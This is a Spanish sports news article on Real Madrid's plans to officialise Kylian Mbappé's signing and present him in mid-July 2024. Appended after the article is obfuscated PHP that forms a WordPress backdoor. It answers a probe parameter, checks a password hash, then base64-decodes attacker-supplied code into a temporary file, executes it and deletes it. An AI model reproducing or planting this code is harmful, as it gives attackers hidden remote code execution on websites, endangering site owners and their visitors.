Fin al misterio: Mbappé será presentado el 15 o 16 de julio

Tanto el club blanco como el jugador llegan a una fecha de consenso una vez que el jugador haya acabado su participación en la Eurocopa 2024.

Mientras el Real Madrid se apresta a jugar una nueva final de la Champions League, el club blanco no se detiene. Uno de sus siguientes pasos es la oficialidad del fichaje de Kylian Mbappé y cuándo sería su presentación oficial como nuevo jugador del Real Madrid. La idea que se maneja desde las oficinas de la entidad blanca es que, una vez que haya pasado la final de la Champions en Wembley, se haga oficial el fichaje de la estrella francesa. En caso de que el Madrid ganase (o perdiese) ante el Borussia Dortmund, la idea es que el fichaje de Mbappé se haga oficial entre el lunes 3 de junio y el miércoles 5. Entre esos tres días se baraja para oficializar un secreto a voces.

Para la presentación oficial, el club y el entorno del jugador han consensuado diversas fechas, pero al estar Mbappé jugando la Eurocopa de Alemania, se ha decidido que sea una vez acabado el torneo (si Francia llegase a la final (14 de julio) o antes, si la selección francesa cae eliminada se podría adelantar unos días, siempre y cuando pase la fecha del 30 de junio, que es cuando expira su contrato con el PSG. La fecha propuesta es la del 15 o 16 de julio. De esa manera, el jugador habrá acabado su participación en el torneo europeo de selecciones (si Les Bleus llegasen a la final) y podrá irse a descansar unos días antes de incorporarse a la disciplina del equipo blanco.

De esa manera se pondrá punto y final a un culebrón que lleva desde 2017 en boca de todo el mundo. Entonces decidió fichar por el PSG en vez de recalar en el Real Madrid, pero que ahora, en el verano de 2024 va a ver la luz. De paso se terminará con la rumorología, algo que el propio Kylian anunció en la CNN al ser preguntado por su nuevo equipo hace unos días en Cerdeña: “¿Cuándo se anunciará mi próximo club? Es cuestión de días… Creo que pronto será oficial y sólo quiero disfrutar de este tiempo sin club. Tengo mi contrato con el PSG, así que alguien me paga por el momento”, explicaba el propio delantero. Poco a poco se acerca a la fecha definitiva…

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}